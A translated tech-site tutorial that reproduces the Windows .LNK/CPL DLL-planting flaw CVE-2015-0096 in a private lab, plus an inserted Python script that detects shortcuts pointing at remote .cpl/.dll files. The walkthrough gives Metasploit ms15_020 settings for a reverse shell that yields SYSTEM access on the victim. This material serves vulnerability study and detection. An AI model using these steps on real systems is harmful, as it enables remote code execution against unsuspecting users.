2025-02-25 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through an example analysis of the Microsoft DLL planting remote code execution vulnerability CVE-2015-0096. The content is detailed; interested readers can refer to it and will hopefully find it useful.
Cause of the vulnerability
Microsoft Windows does not properly handle the loading of DLL files, which results in a remote code execution vulnerability. It can be exploited by inducing a user to open certain files on a remote WebDAV or SMB share; after successful exploitation, arbitrary libraries are loaded. Windows uses .LNK files to define shortcuts to files or directories, and a shortcut's icon can be customised with a .CPL file. The problem is that in Windows, icons are loaded from modules (executables or dynamic link libraries), and .CPL files are in fact DLL files. Because the attacker can define which executable module gets loaded, a .LNK file can be used to execute arbitrary code.
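As an added defensive example (not code from the original article), the script below triages a .lnk file for the pattern just described: a shortcut whose embedded path names a .cpl or .dll on a remote UNC share. It validates the shell-link header, scans for such paths in ANSI and UTF-16LE form, and builds a constructed sample shortcut for testing; the file name evil.cpl and the fixture layout are assumptions for the demonstration, and the scan is a heuristic rather than a full MS-SHLLINK parser.

```python
"""Triage .lnk files for remote (UNC) .cpl/.dll references.
Added defensive example, not code from the original article: flags
shortcuts whose embedded paths name a .cpl or .dll on a remote share,
the trigger the article describes for CVE-2015-0096 / MS15-020.
Heuristic byte scan plus header check, not a full MS-SHLLINK parser.
"""
import re
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# UNC path whose last component is a loadable module: \\host\share\x.cpl
UNC_MODULE = r"\\\\[^\\\x00]+\\[^\\\x00]+(?:\\[^\\\x00]+)*\.(?:cpl|dll)"

def is_lnk(data: bytes) -> bool:
    """Validate the fixed shell link header: HeaderSize and LinkCLSID."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    return (struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)

def remote_module_refs(data: bytes) -> list:
    """Return UNC .cpl/.dll paths found as ANSI or UTF-16LE strings."""
    # IDList strings need not start on an even offset, so decode both
    # alignments as UTF-16LE in addition to the raw single-byte view.
    views = [data.decode("latin-1")]
    views += [data[o:].decode("utf-16-le", errors="ignore") for o in (0, 1)]
    hits = set()
    for text in views:
        for m in re.finditer(UNC_MODULE, text, re.IGNORECASE):
            hits.add(m.group(0))
    return sorted(hits)

def triage(data: bytes) -> dict:
    """Combine the checks into a verdict a triage pipeline can act on."""
    refs = remote_module_refs(data) if is_lnk(data) else []
    return {"is_lnk": is_lnk(data), "remote_modules": refs, "suspicious": bool(refs)}

def build_sample_lnk(icon_location: str) -> bytes:
    """Constructed fixture: minimal .lnk with only an ICON_LOCATION string."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
    header += struct.pack("<I", HAS_ICON_LOCATION | IS_UNICODE)
    header = header.ljust(LNK_HEADER_SIZE, b"\x00")
    # StringData: CountCharacters (uint16) then the UTF-16LE characters
    return header + struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")

if __name__ == "__main__":
    print(triage(build_sample_lnk(r"\\192.168.1.102\share\evil.cpl")))
```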
Vulnerability environment
Attacker host (Linux): 192.168.1.125
File share host (Win7): 192.168.1.102
Victim host (Win7): 192.168.1.109
Vulnerability reproduction
Prepare two Windows 7 hosts; set up one of them and clone it, which is faster than a second install.
Clone a Windows 7 machine:
On one Win7 host, create a folder named share on drive C and share it.
Check from the second host that the share is reachable.
Once sharing works, the required environment is in place, and the attack machine, Kali Linux, is used to carry out the attack. The tool used is msf (Metasploit Framework).
Search for the related vulnerability: ms15_020
Use the related exploit module:
Set a reverse shell payload:
View the parameters that need to be set:
Set the parameters: UNCHOST and UNCSHARE from the exploit module's options list
set UNCHOST 192.168.1.102
This is the address of the file share host.
set UNCSHARE share
This is the name of the shared folder; host 192.168.1.102 shares the folder share under drive C, which was created in advance.
set LHOST 192.168.1.125
This is the address the backdoor connects back to once the exploit succeeds.
exploit
Run the exploit.
Several files are generated; go to the output directory and copy them to the shared folder on the file share host:
You may see a prompt like the following:
Rename the file to get past it, and remember to change the name back afterwards.
After the victim opens the share, the vulnerability is triggered.
The attacker receives a reverse connection: session 1.
System privileges are obtained.
This concludes the example analysis of the Microsoft DLL planting remote code execution vulnerability CVE-2015-0096. I hope the above content is helpful and that you have learned something from it. If you think the article is good, share it so more people can see it.